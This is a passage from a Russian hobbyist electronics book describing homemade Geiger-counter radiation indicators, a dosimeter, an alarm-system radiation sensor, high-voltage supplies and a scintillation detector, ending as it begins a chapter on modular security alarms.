**) Среднее значение естественного радиационного фона на уровне моря близко к 15 мкР/ч. На высоте 1 км фон вырастает примерно вдвое, на высоте 10...12 км - в 10...15 раз. На земном шаре есть несколько мест с аномально высоким уровнем есте- ственного радиационного фона. В 2...4 раза он завышен в некоторых районах Франции, Бразилии, Индии, Египта и почти в 10 раз - на острове Ниуэ в Тихом океане. Причина таких аномалий - особенности местных геологических структур, их радионуклидный состав.

 

Рис. 68. Радиационный индикатор «Сторож-Р»

Изображение: 

Рис. 69. Печатная плата «Сторожа-Р»

Изображение: 

2. Радиационный индикатор в радиоприемнике

Радиационный индикатор в радиоприемнике

Транзисторный приемник с введенным в него радиационным детектором не только приобретает новую важную функцию, но объединение этих двух аппаратов имеет очевидные выгоды: корпус, источник питания, усилитель низкой частоты и акустический излучатель могут быть в таком «комбайне» общими.

Принципиальная схема радиационного блока, встраиваемого в транзисторный радиоприемник, показана на рис. 70. В его основе - радиационный индикатор «Сторож-Р» (см. в этой книге). Поскольку

3-3.jpg

Рис. 70. Принципиальная схема встраиваемого радиационного индикатора

3-4.jpg

Рис. 71. Печатная плата индикатора

различаются эти приборы лишь формой тревожного сигнала (вспышки светодиода там и тональные посылки здесь), то здесь уделим основное внимание возможной конструкции такого «комбайна», стыковке его составляющих.

Все элементы индикатора, за исключением переключателя SA1, монтируют на двусторонней печатной плате, «монтажная» сторона которой показана на рис. 71. Фольгу со стороны деталей используют лишь в качестве нулевой шины-«земли», в местах пропуска проводников в ней вытравлены кружки диаметром 1,5...2 мм, а места соединения с ней «заземляемых» проводников показаны черными квадратами. Высота устанавливаемых на плату деталей не должна превышать 8...9 мм. Счетчик Гейгера крепят на плате со стороны печатных проводников с помощью надетых внатяг на выводы анода и катода проволочных скоб, впаянных затем в предназначенные для них отверстия.

Полностью смонтированный радиационный блок (его габариты 19х23х109 мм, масса 22 г) можно установить в радиоприемник так, как это показано на рис. 72, а. В стенке корпуса делают сквозной вырез 11х109 мм для пропуска счетчика Гейгера. Во избежание возможного его повреждения (корпус счетчика очень тонок) на этот вырез наклеивают глубокую (-9 мм) накладку, имеющую форму продолговатой коробки с прорезями - окнами. Такое размещение радиационного блока возможно, если в радиоприемнике найдется свободное пространство 12х19х109 мм.

Вариант размещения, показанный на рис. 72, б, потребует большего пространства - 21х19х109 мм. Правда, габариты приемника в этом случае почти не изменятся: закрывающая вырез в корпусе (9х92 мм) защитная решетка может иметь толщину лишь 1,5...2 мм.

3-5.jpg

Рис. 72. Варианты размещения индикатора в радиоприемнике

3-6.jpg

Рис. 73. Радиационный индикатор в выносном блоке

Но если радиоприемник мал или «упакован» так, что установить в нем радиационный блок никак не удается*, то его можно поместить в отдельный футляр (рис. 73, а) и, связав с приемником тонким трехпроводным кабелем, носить так, как показано на рис. 73, б.

Выключатель питания SA1, которым к работающему приемнику подключают радиационный индикатор, можно установить в любом удобном для этого месте. Нередко в качестве выключателя удается использовать тот или иной коммутационный элемент самого приемника - например, свободную или не слишком нужную позицию переключателя диапазонов. Включенный индикатор никак не повлияет на работу приемника - на фоне принимаемой программы появятся лишь редкие (при нормальном радиационном фоне 15...25 имп/мин) акустические щелчки.

Радиационный индикатор рассчитан на установку в радиоприемники, имеющие 9-вольтное питание. Но его можно переделать и для работы в приемниках, питающихся от 6-вольтных батарей. Для этого потребуется лишь изменить моточные данные трансформатора Т1: обмотка II должна иметь 5, а обмотка III - 2 витка провода ПЭВШО-0,12.,.0,15. Обмотка I остается без изменений - все те же 420 витков ПЭВ-2-0,07.

Среди транзисторных приемников, особенно старых выпусков, могут оказаться модели, в которых с нулевой шиной-«землей» соединен не минус источника питания, а плюс. В таких случаях нужно лишь переполюсовать питание индикатора: соединить его «+» с «землей», а общий провод - с «-» радиоприемника.

Номинал резистора R6 выбирают в пределах (10...20)R, где R - сопротивление регулятора громкости радиоприемника.

Накладку или решетку, защищающую счетчик Гейгера от возможного повреждения, изготавливают из того же материала, что и корпус приемника. Если это ударопрочный полистирол (обычно это так), то для их склейки можно использовать распущенную в растворителе 647 стружку того же полистирола (того же цвета). Это по существу сварное соединение отличается высокой прочностью. Тем же клеем крепят к корпусу приемника и полистироловые стойки - опоры под печатную плату. Они должны иметь отверстия с резьбой под винт М2. Подходящие стойки, даже с залитыми в них металлическими вкладышами, нередко обнаруживаются в корпусах выброшенных электро- и радиоаппаратов самого разного назначения.

Трудности объединения этих двух аппаратов связаны, очевидно, с тем, что обычные бытовые транзисторные радиоприемники изначально на такое их применение не рассчитаны. Конечно, все элементы радиационного блока можно было бы разместить на общей с радиоприемником печатной плате, предусмотрев в его корпусе соответствующее «окно» для счетчика Гейгера.

Обратим внимание будущих конструкторов таких «комбайнов» на особенности УНЧ, противоречивость предъявляемых к нему здесь требований. С одной стороны, при работе с радиоприемником УНЧ должен иметь достаточно малые нелинейные искажения, а с другой - при работе лишь с радиационным индикатором - предельно малое, в паузе близкое к нулю, энергопотребление (ток, потребляемый самим индикатором, <0,2 мА). Энергоэкономичность режима радиационного контроля вовсе не самоцель - в сомнительных обстоятельствах радиационную обстановку контролируют непрерывно.

В заключение заметим, что описанный здесь радиационный индикатор сохранит свою главную функцию - функцию прибора, следящего за радиационной обстановкой, и без узла, формирующего тревожный сигнал. Поэтому при необходимости (отсутствии, например, микросхемы К176ЛП1) этот узел можно исключить (исключают микросхему DD2, диоды VD4 и VD5, резисторы R8...R13, конденсаторы С8 и С9, а вывод 10 элемента DD1.1 соединяют непосредственно с выводом 6 элемента DD1.3).


*) Радиационная чувствительность счетчика Гейгера зависит от его размеров (см. приложение 4). В стремлении непременно вписаться в габариты малоразмерного приемника мы могли бы воспользоваться и малоразмерным счетчиком Гейгера, тем же СБМ10 или СБМ21. Но значительное (в 6...10 раз) снижение радиационной чувствительности вряд ли было бы оправдано в приборе такого назначения.

 

Рис. 70. Принципиальная схема встраиваемого радиационного индикатора

Изображение: 

Рис. 71. Печатная плата индикатора

Изображение: 

Рис. 72. Варианты размещения индикатора в радиоприемнике

Изображение: 

Рис. 73. Радиационный индикатор в выносном блоке

Изображение: 

3. Радиолюбительский дозиметр

Радиолюбительский дозиметр

Ионизирующая радиация опасна для человека в любых дозах. В небольших ее воздействие оказывается очень замаскированным - последствия могут проявиться спустя годы, десятилетия и даже в следующих поколениях (онкология, генетические повреждения и др.). С увеличением уровня облучения не только возрастает вероятность таких последствий, но в организме человека возникают нарушения, которые могут привести его к гибели в считанные дни, часы, а то и прямо «под лучом»*. Так что знать уровень радиации, иметь возможность хотя бы приблизительно оценить его представляется никак не лишним.

Обнаружив повышенный уровень ионизирующего излучения, естественно поинтересоваться его источником. Что это: тайно захороненные радиоактивные отходы? Ускоритель соседнего НИИ? Рентгеновский аппарат, «светящий» не туда? Изотопная «мина» просвещенного киллера? Выброшенный за ненадобностью пожарный датчик? Радиоактивный минерал? Кость динозавра?... Какова активность обнаруженного? Конфигурация его излучения?... Для ответов на все эти вопросы нужен прибор, способный в каких- то единицах измерять уровень ионизирующего излучения.

Принципиальная схема радиолюбительского дозиметра, ведущего измерения ионизирующего излучения в ЕРФ - в единицах естественного радиационного фона (Dф@15 мкР/ч), приведена на рис. 74**.

Датчиком радиации BD1 в дозиметре является счетчик Гейгера типа СБМ20, чувствительный к g- и жесткому b-излучению (см. приложение 4). Его реакция на естественный радиационный фон - импульсы тока, следующие без видимого порядка со средней скоростью Na=20...25 имп/мин***. Скорость счета в счетчиках Гейгера линейно связана с уровнем радиации.

3-7.jpg

Рис. 74. Радиолюбительский дозиметр

Так, на десятикратное увеличение ее уровня счетчик СБМ20 отреагирует десятикратным же увеличением скорости счета - до Nрад =200...250 имп/мин. Прямая пропорциональность преобразования Nрад <->Dрад начнет нарушаться лишь при очень значительных уровнях радиации, с появлением большого числа импульсов, разделенных слишком малым, за пределами разрешающей способности счетчика, временным интервалом. В паспорте счетчика обычно указывают Nmax - максимальную скорость счета. Для счетчика СБМ20 Nmax=4000 имп/с. И если он сохранит линейность преобразования Nрад <->Dрад хотя бы до 2000 имп/с, то по скорости счета можно будет численно оценивать радиационные поля в диапазоне Dрад =(1...5000) Dф - более чем достаточном для бытового прибора.

Рекомендуемое напряжение питания счетчика СБМ20 - Uпит=360...440 В. На этот диапазон напряжений приходится так называемое плато: изменения Uпит в этих пределах мало сказывается на скорости счета и принимать меры к его стабилизации нет необходимости. Во всяком случае - в приборах умеренной точности.

Устройство, преобразующее напряжение батареи, питающей дозиметр, в высокое напряжение Uпит на аноде счетчика Гейгера, построено на блокинг-генераторе (T1, VT1 и др.). На повышающей обмотке I его трансформатора формируется короткий - 5...10 мкс - импульс амплитудой 440...450 В, заряжающий через диоды VD1, VD2 конденсатор С1. Частота следования импульсов блокинг-генератора F@1/2R6·C3@40 Гц.

Каждая ионизирующая частица, возбуждающая счетчик Гейгера, становится причиной короткого лавинообразно развивающегося разряда. Возникающие на нагрузке счетчика, резисторе R1, импульсы напряжения поступают на одновибратор (DD10.3, DD10.4 и др.), формирующий из них «прямоугольные» импульсы длительностью tф1@R7·C7@0,2 мс и амплитудой, достаточной для управления КМОП-микросхемами. Все нужные в приборе временные интервалы и частоты формирует счетчик DD1. Его задающий генератор работает на частоте кварцевого резонатора ZQ1 - 32768 Гц.

Счетный узел дозиметра составлен из трех десятичных счетчиков DD4, DD5, DD6, люминесцентные индикаторы HG1, HG2 и HG3 которых индицируют, соответственно, «единицы», «десятки» и «сотни», и одного двоичного счетчика - DD7, представляющего «тысячи». Выходы десятичных счетчиков подключены к соответствующим сегментам люминесцентных индикаторов, а выходы счетчика DD7 - к децимальным точкам этих же индикаторов, на которых «тысячи» индицируются в двоичном коде: °°° - «0», °°* - «1», °*° - «2»,..., ** ° - «6», ***- «7» ( &deg - точка «не горит», * - точка «горит»). Емкость счетного узла увеличивается таким образом до «7999».

Счетчик DD3 формирует единицу измерения, принятую в этом приборе. Если его датчик находится в условиях нормального радиационного фона, то на измерительном интервале tизм=39 с (это длительность «нуля» на выходе М счетчика DD1) на вход DD3 поступает в среднем Nф·39/60=(20...25)·39/60@16 импульсов. Т.е. в норме, при Nрад@Nф на табло счетчика будет зафиксировано: «000», если Nрад<16, или «001», если 16<Nрад<32 (время tизм выбрано так, чтобы флуктуации Nф практически никогда не достигали значения 2Nф ).

Измерительный интервал tизм завершается tинд - 3-секундной демонстрацией результата измерения. Ее формирует счетчик DD2. На время t блокируется вход счетного узла и включается устройство (VT3, VT4, Т2 и др.), преобразующее напряжение питания микросхем в значительно более низкое напряжение питания накалов люминесцентных индикаторов. Его форма - меандр, частота - 32768 Гц.

Интервал индикации tинд заканчивается переводом всех счетчиков прибора в нулевое состояние. И тут же начинается новый цикл измерения.

Прибор смонтирован на односторонней печатной плате размерами 123х88 мм, изготовленной из фольгированного стеклотекстолита толщиной 1,5 мм (рис. 75). На плате установлены все детали, кроме выключателя питания, звукоизлучателя и батареи «Корунд». Почти все резисторы в приборе - типа МЛТ-0,125 (R1 - КИМ-0,125). Конденсаторы: С1 - К73-9, С2 - КДУ или К2М (на напряжение не менее 500 В), СЗ, С4 и С5 - К53-1, остальные - КМ-6, К10-176 и др..

Трансформатор Tl наматывают на ферритовом кольце М3000МН К16х10х4,5, предварительно загладив его ребра наждачной бумагой и обмотав тонкой лавсановой или фторопластовой лентой. Первой наматывают обмотку I, содержащую 420 вит ков провода ПЭВ-2 0,07. Ее размещают почти по всему сердечнику, с промежутком 1,5...2 мм между началом и концом. Намотку ведут почти виток к витку, смещаясь по сердечнику лишь в одну сторону. Обмотку I также покрывают слоем изоляции. Обмотки II (8 витков) и III (3 витка) наматывают проводом ПЭВШО 0,15...0,25.

3-8.jpg

Рис. 75 Печатная плата дозиметра (масштаб 1:2)

Они должны быть распределены по сердечнику возможно равномернее. При монтаже трансформатора необходимо соблюдать фазировку его обмоток (их начала отмечены на схеме значком «•»). Экспериментировать с этим не следует - можно сжечь транзистор VT1.

Трансформатор Т2 наматывают на кольце К10х6х5 (феррит 2000НН). Его готовят к намотке так же, как и сердечник для трансформатора Т1. Обмотку I (400 витков) наматывают в два провода (ПЭВ-2 0,07). Конец одной полуобмотки соединяют с началом другой, так образуется средняя точка. Обмотка II содержит 17 витков провода ПЭВ-2 0,25...0,4.

Снаружи трансформаторы рекомендуется обмотать пластиковой изолентой - узкой полоской, вырезанной из липкой ПВХ. Это защитит их от неблагоприятных внешних воздействий. Крепят трансформаторы винтом МЗ (резьба в плате). Более простое, казалось бы, крепление трансформатора проволочной скобой таит в себе опасность: скоба может образовать в трансформаторе короткозамкнутый виток; нередкая, к сожалению, ошибка. Во избежание обрыва обмотки или замыкания ее витков крепление должно быть мягким, эластичным.

Плату монтируют на передней панели прибора (ударопрочный полистирол, дюралюминий и т.п.), в которой вырезано окно против люминесцентных индикаторов. Оно может быть закрыто зеленым фильтром. На ней же в вырезе нужного размера монтируют пъезоизлучатель ЗП-1 или ЗП-22. А под светодиод HL1 делают соответствующее его размерам отверстие.

Корпус прибора - стандартная пластмассовая коробка 130х95х20 мм (например, из-под шашек). Во избежание заметного уменьшения чувствительности прибора к мягкому ионизирующему излучению в стенке корпуса, примыкающей к счетчику Гейгера, нужно сделать вырез 10х65 мм, который затем можно перекрыть редкой решеткой.

Конечно, далеко не все из вышеперечисленного является строго обязательным. Резисторы типа МЛТ можно заменить на другие такого же размера. В качестве VT3, VT4 могут быть взяты практически любые n-p-n транзисторы. Если их усиление по току будет невелико, потребуется, возможно, несколько уменьшить сопротивление резисторов R9 и R10. Возможна и даже желательна замена люминесцентных индикаторов ИВ3 на ИВ3А, имеющие меньший ток накала.

Не является незаменимым и счетчик СБМ20. Пригодны любые 400-вольтные счетчики Гейгера, имеющие фоновую активность Nф@24 имп/мин. В этом случае в схему прибора не потребуется вносить никаких изменений. Если же Nф будет иным, то между выходами 1, 2, 4, 8 и 16 счетчика DD3 и входом счетчика-накопителя нужно включить диодно-резисторный дешифратор, в котором установкой соответствующих диодов должно быть набрано число, возможно более близкое к 0,65 Nф. На фрагменте схемы (рис. 76) показано, как это сделать для Nф=I6. Здесь 0,65 Nф@11, что в двоичном коде и набрано в дешифраторе. На печатной плате предусмотрено место для установки диодно-резисторного дешифратора.

3-9.jpg

Рис. 76. Дешифратор для коррекции Nф {Nф=16)

Возможен и другой путь: требуемое Nф может быть получено параллельным включением нескольких малочувствительных счетчиков Гейгера. Подойдет, например, «батарея» из пяти счетчиков СБМ10 или СБМ21.

Параметры наиболее подходящих для бытовых дозиметров счетчиков Гейгера приведены в приложении 4.

Таблица 12

Напряжение питания, В

9,0

8,0

7,0

6,0

5,6

Скорость счета, ед. Nф

35,8

34,2

34,0

32,8

32,8


 

Светодиод HL1, включающийся при переполнении счетчика-накопителя, т.е. при очень высоком уровне ионизирующего излучения, должен быть красным и возможно более ярким: АЛ307КМ, АЛ307ЛМ и др.

Параметры трансформатора Т1 выбраны так, что при разряде батареи питания напряжение на счетчике Гейгера остается в пределах плато счетной характеристики. Таблица 12 демонстрирует зависимость скорости счета от напряжении питания прибора при неизменной активности источника радиации.

В таблице 13 показана зависимость потребляемого прибором тока от напряжения источника питания.

Масса прибора с батареей «Корунд» - 225 г.

Табло счетчика-накопителя может быть выполнено и на жидко-кристаллических индикаторах. Принципиальная схема этого узла с табло типа ИЖЦ5-4/8 показана на рис. 77.

Поскольку в табло ИЖЦ5-4/8 четыре разряда, счетчик «тысяч» выполнен здесь аналогично предыдущим - на десятичном счетчике К176ИЕ4.

В дозиметре с ЖКИ не нужен, конечно, блок формирования напряжения накала. Поэтому элементы VT3, VT4, Т2, R9, R10 могут быть удалены, a DD9.1 и DD9.2 использованы по другому назначению (в противном случае их входы нужно соединить с «землей» или с «+» источника питания).

Таблица 13

Режим

Потребляемый ток, мА, при напряжении питания, В

9.0

8,0

7,0

6,0

Счет при N@Nф.

0,82

0,66

0,53

0,42

Счет при N@130Nф

1,20

0,95

0,75

0,60

Индикация

23,5

21,0

18,5

16,0


 

3-10.jpg

Рис. 77. ЖКИ табло для дозиметра

Счетчик DD7 может быть сохранен, но лишь для формирования сигнала тревоги: при появлении на табло «8000» - уровня радиации, в 8000 раз превышающего уровень естественного радиационного фона, - он включит тревожную звуковую и световую сигнализации.

Еще одна особенность ЖКИ - сигнал на его сегменте должен иметь форму меандра. Сегмент становится заметным (черным), если его меандр находится в противофазе с меандром подложки ЖКИ (выводы 1 и 34), и остается фоновым, не выделенным, если их фазы совпадают. Счетчик К176ИЕ4 формирует на своих выходах меандры «единичной» и «нулевой» фазы, если на его вход S (выв. 6) подан опорный меандр с частотой следования несколько десятков или сотен герц. Можно, например, подключить входы S всех четырех счетчиков к выходу F (частота 1024 Гц) счетчика QD1.

Энергоэкономичность дозиметра с жидкокристаллическим табло будет, конечно, значительно выше, нежели с люминесцентным.


*) Homo sapiens - один из самых чувствительных к ионизирующей радиации биологических видов. Летальная доза для человека - 600 рентген.

**) Естественный радиационный фон в качестве своего рода тест-генератора дает возможность прокалибровать бытовой дозиметрический прибор, в том числе и самодельный, не прибегая к помощи каких-либо служб. Эта нестрогая единица позволила в свое время легализовать самодельные дозиметрические приборы.

***) Некоторая часть N. должна быть отнесена к самому счетчику, в частности, к воздействию на него радиоизотопов, входящих непосредственно в его конструкцию. В хороших счетчиках Гейгера эта составляющая N. достаточно мала и в бытовых приборах обычно не учитывается.

 

Рис. 74. Радиолюбительский дозиметр

Изображение: 

Рис. 75 Печатная плата дозиметра (масштаб 1:2)

Изображение: 

Рис. 76. Дешифратор для коррекции Nф {Nф=16)

Изображение: 

Рис. 77. ЖКИ табло для дозиметра

Изображение: 

4. Датчик радиации в охранной системе

Датчик радиации в охранной системе

Принципиальная схема датчика, непрерывно контролирующего радиационную обстановку в районе своего расположения, показана на рис. 78.

Транзистор VT1, импульсный трансформатор Т1 и др. составляют блокинг-генератор, импульсы с повышающей обмотки I которого через диоды VD1, VD2 заряжают конденсатор С1 до напряжения +360...440 В. Этот конденсатор - источник питания счетчика Гейгера BD1. Импульс напряжения, возникающий на аноде BD1 в момент его возбуждения ионизирующей частицей (см. осциллограмму), поступает на вход формирователя (DD1.1, DD1.2 и др.), преобразующего его в «прямоугольный» длительностью R6·C5@1 мс, и затем на вход С счетчика DD2.

Выходом датчика является выход «32» счетчика DD2, на котором сигнал 1 - признак радиационной опасности - возникнет лишь в том случае, если Nт - общее число импульсов, поступивших на С-вход счетчика за время Т, достигнет 32. Поскольку Nт зависит от Nф - средней скорости счета счетчика Гейгера в условиях естественного радиационного фона и DNф - его флуктуаций, возникающих из-за краткости измерений, то длительность измерительного интервала Т должна быть такой, чтобы вероятность появления Nт+DNт=32 в результате какого-либо измерения оказалась бы пренебрежимо малой (по характеру происходящих здесь процессов она не может быть равна нулю).

3-11.jpg

Рис. 78. Датчик радиации в охранной системе

Так, например, если в счетчике Гейгера, имеющего Nф=20 имп/мин (это устанавливают длительными измерениями), при экспозиции T=1 мин флуктуации DNт max=10, т.е. не выходят из пределов 10 имп/мин (это устанавливают в процессе измерения Nф), то Nт max=20+10<32 и такой датчик не поднимет ложной тревоги.

Может показаться, что измерения можно было бы легко ускорить. Взяв, например, Т=1/2 мин и сделав выходом датчика выход «16» счетчика DD2. Но если «постоянная составляющая» фона в таком случае уменьшится вдвое и составит Nф/2=10, то его флуктуации - лишь в Ц2 раз, до DNт max/Ц2 = 10/Ц2=7. В таком случае Nт max=10+7>16 и такой датчик будет время от времени подавать сигнал радиационной опасности без какого-либо на то основания. Со всеми вытекающими отсюда последствиями. Прежде всего - недоверием к нему.

В тех случаях, когда возникает необходимость зафиксировать и кратковременное появление источника радиации (перемещающегося,

3-12.jpg

Рис. 79. Генератор импульсов сброса к датчику радиации

например, в проходящем мимо автомобиле), берут счетчик Гейгера, обладающий большей радиационной чувствительностью, или используют несколько малочувствительных счетчиков, набрав нужную чувствительность их числом (счетчики Гейгера можно включать параллельно - при низких, фоновых скоростях счета их радиационные чувствительности суммируются).

В приложении 4 приведены основные параметры счетчиков Гейгера отечественного производства, среди которых можно подобрать наиболее подходящий для решения той или иной задачи.

Трансформатор Т1 может быть здесь таким же, как и в «Стороже-Р». Принципиальная схема генератора импульсов, задающих паузу Т на входе R счетчика DD2, показана на рис. 79, а. Хотя в этом, как правило, не возникает необходимости — почти всегда охранная система имеет электронные часы с многоразрядным делителем частоты и сформировать нужную последовательность коротких импульсов можно так, как показано на рис. 79, б.

 

Рис. 78. Датчик радиации в охранной системе

Изображение: 

Рис. 79. Генератор импульсов сброса к датчику радиации

Изображение: 

5. Экономичный источник питания счетчика Гейгера

Экономичный источник питания счетчика Гейгера

В автономных приборах непрерывного радиационного контроля, использующих в качестве датчиков радиации счетчики Гейгера, основным энергопотребителем является устройство, преобразующее невысокое напряжение источника питания прибора в напряжение 360...440 В, соответствующее плато счетной характеристики галогенового счетчика Гейгера (см. приложение 4). Принципиальная схема энергоэкономичного преобразователя напряжений показана на рис. 80.

3-13.jpg

Рис. 80. Экономичный источник питания счетчика Гейгера

Его основу составляет блокинг-генератор, на выходной обмотке которого формируются короткие (5...10 мкс) импульсы амплитудой около 420 В. Через диоды VD3, VD4 они заряжают конденсатор С4. Этот конденсатор и будет источником питания счетчика Гейгера (напомним, что проводимость счетчика Гейгера в паузе между возбуждениями близка к нулю).

Энергоэкономичность преобразователя обеспечивается тем, что межимпульсная пауза в его блокинг-генераторе задается не собственной времязадающей цепочкой R1C3, как это обычно делается, а одновибратором (DD1.1, DD1.2 и др.), работающим на микротоках [2]. Продолжительность паузы в нем tп@R3·C5 выбирают так, чтобы напряжение на выходе преобразователя в режиме фонового счета было близко к высшему значению напряжения на плато счетной характеристики счетчика Гейгера. (В дальнейшем снижение напряжения на выходе преобразователя, его смещение к другому краю плато будет обязано лишь снижению напряжения источника питания.)

Блокинг-генератор сформирует внеочередной импульс подпитки конденсатора С4, если на входе 2 элемента DD1.2 возникнет провоцирующий ее импульс. Если этот импульс будет возникать при каждом срабатывании счетчика Гейгера, то это позволит удержать напряжение на выходе преобразователя на уровне, не зависящем от скорости счета.

Трансформатор Т1 блокинг-генератора наматывают на ферритовом сердечнике, составленном из двух колец М3000МН 12х8х3 мм. Кольца склеивают, острые их ребра заглаживают наждачной бумагой и весь сердечник обматывают тонкой фторопластовой или лавсановой лентой.

Сначала наматывают обмотку II, она содержит 420 витков провода ПЭВ-2 0,07. Намотку ведут в одну сторону, почти виток к витку, оставляя между ее началом и концом «зазор» 1...1.5 мм. Обмотку II также покрывают слоем изоляции. Далее наматывают обмотку I - 5 витков провода ПЭВШО 0,15...0,2 - и по ней - обмотку III - 2 витка того же провода. Эти обмотки должны быть распределены по сердечнику возможно равномернее.

Правильная фазировка обмоток трансформатора (точками показаны их синфазные концы) должна быть соблюдена при его монтаже. Экспериментировать с этим не следует - можно сжечь транзистор.

В преобразователе: резисторы Rl, R2 - типа МЛТ-0,125, R3 - КИМ-0,125; конденсатор С1 - любой оксидный, С2, С5 - типа КМ-6 или К10-176, СЗ - К53-30, С4 - К73-9.

Преобразователи такой структуры закрывают, по существу, саму проблему питания счетчиков Гейгера от низковольтных источников: потребляемый таким преобразователем ток уже составляет малую часть тока саморазряда большинства гальванических батарей.

 

Рис. 80. Экономичный источник питания счетчика Гейгера

Изображение: 

6. Сцинтилляционные детекторы ионизирующего излучения

Сцинтилляционные детекторы ионизирующего излучения

Для обнаружения ионизирующего излучения нередко используют способность некоторых веществ - сцинтилляторов - делать видимой, светящейся траекторию «простреливающей» их ионизирующей частицы.

Сцинтилляционные детекторы ионизирующих излучений имеют определенное преимущество перед счетчиками Гейгера - по амплитуде и длительности вспышки можно судить о типе и энергии породившей ее частицы. Важно и то, что сцинтилляционный счетчик имеет значительно большую эффективность, нежели счетчик Гейгера, фиксирующий обычно лишь одну-две частицы из ста в него попавших.

Конструктивно сцинтилляционный счетчик прост: нужный сцинтиллятор (см. приложение 7) наклеивают на катод фотоэлектронного умножителя (ФЭУ) и все это помещают в тщательно изолированный от посторонней подсветки бокс. Остальное - подсчет фотоимпульсов, сортировка их по амплитуде, форме и т.п. - дело обычной электронной техники.

Принципиальная схема фотоголовки сцинтилляционного счетчика приведена на рис. 81, а высоковольтного преобразователя для ее питания - на рис. 82. Напряжение питания ФЭУ - высокое по отношению к «земле» - подают обычно на его катод. Это позволяет связать анодную цепь ФЭУ с электронным анализатором прибора гальванически, учитывать при необходимости и постоянную составляющую его фототока.

Напряжение питания ФЭУ, его распределение между динодами и, соответственно, соотношения номиналов резисторов R2...R13, составляющих динодный делитель, зависят от типа фотоумножителя (см. приложение 6). Здесь мы воспользовались относительно

3-14.jpg

Рис. 81. Фотоголовка сцинтилляционного детектора ионизирующей радиации

низковольтным ФЭУ-85. Поскольку режим работы ФЭУ в сцинтилляторах бытового назначения близок к «темновому», сопротивления динодных резисторов могут быть и значительно выше рекомендованных (при сохранении пропорций).

Единственная оперативная регулировка в канале - резистор R14 - выполняет очень важную функцию: на компараторе DA1 им задают пороговое напряжение U3-4. Лишь импульсы, имеющие амплитуду Uимп>U3-4, откроют компаратор и на его выходе (выв. 9) будет сформирован импульс цифрового стандарта.

В автономной, дозиметрической аппаратуре, использующей ФЭУ, возникает проблема их питания. Необходимое ФЭУ высокое напряжение Uфэу (0,8...1 кВ и более), требования к его стабильности (фоточувствительность ФЭУ довольно сильно зависит от напряжения питания; см. приложение 7) предъявляют к устройствам, формирующим это напряжение, довольно жесткие требования.

3-15.jpg

Рис. 82. Преобразователь для питания ФЭУ

Основу высоковольтного преобразователя, показанного на рис. 82, составляет блокинг-генератор, формирующий на обмотке II трансформатора Т1 импульсы напряжения с амплитудой Uимп@Uфэу. Через диодный столб VD3 они заряжают конденсатор С5, который становится таким образом источником питания фотоумножителя. Пульсации Uфэу (они имею форму «пилы» с временными интервалами между «зубцами» tп@R7·C4) снимает RC-фильтр (С5, R8, С6, R9, С7).

В цепь питания блокинг-генератора введен транзистор VT2, коллекторный ток которого зависит от тока базы, зависящего, в свою очередь, от тока стока полевого транзистора VT3 . Напряжение на затворе этого транзистора зависит от Uфэу, напряжения на стабилитроне VD1 (транзистор VT1 - его токозадающий «резистор») и соотношения «плечей» делителя R3+R4, R6 (резистором R3 выставляют нужное Uфэу ). Легко видеть, что при понижении Uфэу (по абсолютной величине), возникшем по какой-либо дестабилизирующей причине, напряжение питания блокинг-генератора увеличится и воздействие дестабилизирующего фактора будет тем самым в значительной мере компенсировано.

Трансформатор блокинг-генератора наматывают на ферритовом кольце М3000МН 20х12х6 мм. В связи с тем, что этот феррит имеет низкое объемное сопротивление, острые ребра сердечника необходимо загладить и тщательно весь его изолировать; обмотать, например, лавсановой или фторопластовой лентой.

Первой наматывают обмотку II, содержащую 800 витков провода ПЭВ-2 0,07. Намотку ведут в одну сторону, почти виток к витку, оставляя между началом и концом обмотки промежуток 2...3 мм. Обмотку II также покрывают слоем изоляции. Обмотку I (8 витков ПЭВШО 0,15...0,25) и обмотку III (3 витка тем же проводом) укладывают по сердечнику возможно равномернее.

Фазировка обмоток (точками на Т1 отмечены их синфазные концы) должна быть соблюдена при монтаже трансформатора.

О деталях преобразователя. Резистор R6 - КИМ-0,125, R3 - СП-38А, другие - МЛТ-0,125 и 0,25. Конденсаторы СЗ, С4 - КМ-6 или К10-176; С5 ,С7 - К15-5-Н70 (1,5 кВ) или другие керамические на напряжение не менее 1 кВ; С1 и С2 - любые оксидные. Диодный столб 2Ц111А-1 можно заменить четырьмя последовательно включенными диодами типа КД102А. При каких-либо иных заменах нужно иметь в виду, что диодный столб VD3 не только должен иметь высокое обратное напряжение - не менее Uфэу , но и малый (при этом напряжении) ток утечки - не более 0,1 мкА.

Транзистор блокинг-генератора можно заменить на КТ630В. Здесь определяющим параметром является напряжение насыщения транзистора в импульсном режиме: при токе в импульсе 1...1,5 А - Uкэ нас имп Ј0,3 В. Остаточное напряжение на коллекторе транзистора нетрудно оценить по осциллограмме: по «зазору» между плоской вершиной импульса и линией нулевого потенциала.

Ток, потребляемый высоковольтным преобразователем от источника питания, будет зависеть, конечно, от нагрузки. С двумя описанными здесь сцинтилляционными головками, работавшими в режиме радиационного локатора, он не превышал 16 мА.

 

Рис. 81. Фотоголовка сцинтилляционного детектора ионизирующей радиации

Изображение: 

Рис. 82. Преобразователь для питания ФЭУ

Изображение: 

8. Охранные устройства и средства безопасности

Охранные устройства и средства безопасности

 

1. Многофункциональная система охраны

Многофункциональная система охраны

Схема охраны построена по модульному принципу (рис. 2.1), что дает возможность легко собрать систему охраны, наиболее удобную для конкретных целей — от охраны квартиры, дачи до автомобиля. При этом, собирая и подключая к базовому блоку дополнительные модули, можно легко расширять функциональные возможности системы охраны, например ввести автоматическое оповещение по телефонной линии соседей или родственников, а также ряд других полезных функций.

2-1.jpg

Рис. 2.1. Структурная схема модульной системы охраны

При разработке не применялись дорогие или дефицитные детали, что делает схемы легко доступными для повторения всеми желающими, а использование модульного принципа построения упростило отдельные узлы системы.

Все схемы собраны на широко распространенных «МОП микросхемах, что обеспечивает минимальное потребление тока, работу в широком диапазоне питающих напряжений (4...15 В) и высокую надежность. Временные интервалы,
необходимые для работы системы, получены без использования электролитических конденсаторов, что также повышает надежность и расширяет диапазон рабочих температур.

 

1. Базовый блок охраны

Базовый блок охраны

В простейшем варианте для работы охранной сигнализации достаточно подключить блок временных интервалов (A3) к источнику питания (А1), а также установить датчики F1...F4 и кнопки управления SB1 — включение, SB2 — выключение охраны (рис. 2.2). Такое подключение в тексте называется "базовый блок".

2-2.jpg

Рис. 2.2. Базовый блок охранной сигнализации

Технические характеристики базового блока охраны:

